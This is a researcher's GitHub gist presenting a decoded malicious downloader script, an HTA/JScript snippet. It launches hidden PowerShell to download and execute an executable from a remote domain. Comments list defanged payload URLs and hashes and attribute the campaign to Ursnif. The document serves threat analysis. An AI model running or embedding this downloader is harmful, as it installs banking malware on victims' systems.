Skip to content

Instantly share code, notes, and snippets.

@Blevene
Created March 2, 2018 12:10
Show Gist options
  • Save Blevene/a617715d2fe2a1a72fdace3a376dd3dd to your computer and use it in GitHub Desktop.
Save Blevene/a617715d2fe2a1a72fdace3a376dd3dd to your computer and use it in GitHub Desktop.
Decoded downloader component from d8ecb55b823b87a06eb8fc524baff969974a092385ac09bdb02537202380375c
<script>
var diskomagana = ActiveXObject;
var termianxala = new diskomagana('WScript.Shell');
var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
setTimeout(function(){window.close()},16180);
setTimeout(function(){termianxala.run(lopomeriara,0)})
</script>
@Blevene
Copy link
Author

Blevene commented Mar 2, 2018

I managed to find a live payload from:

hXXp://173.44.42[.]156/track/amgb.class
hXXp://173.44.42[.]156/track/amg.class
hXXp://173.44.42[.]156/track/amgc.class

Which was present in
3e9d59dcefb6fa5e17d2d9fb9d50e63b712b9fd852444cd341d0675b6ed70186 from
the 26th of February.

The payload,
2c5429d1b834abab3c96da9708e6fb77f52d5b26dc32b6411f3d2c70652210b2, is Ursnif

@Blevene
Copy link
Author

Blevene commented Mar 2, 2018

It appears this pattern of mshta.exe downloading from a URI with utma= in it goes back to December 2017. All Ursnif.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment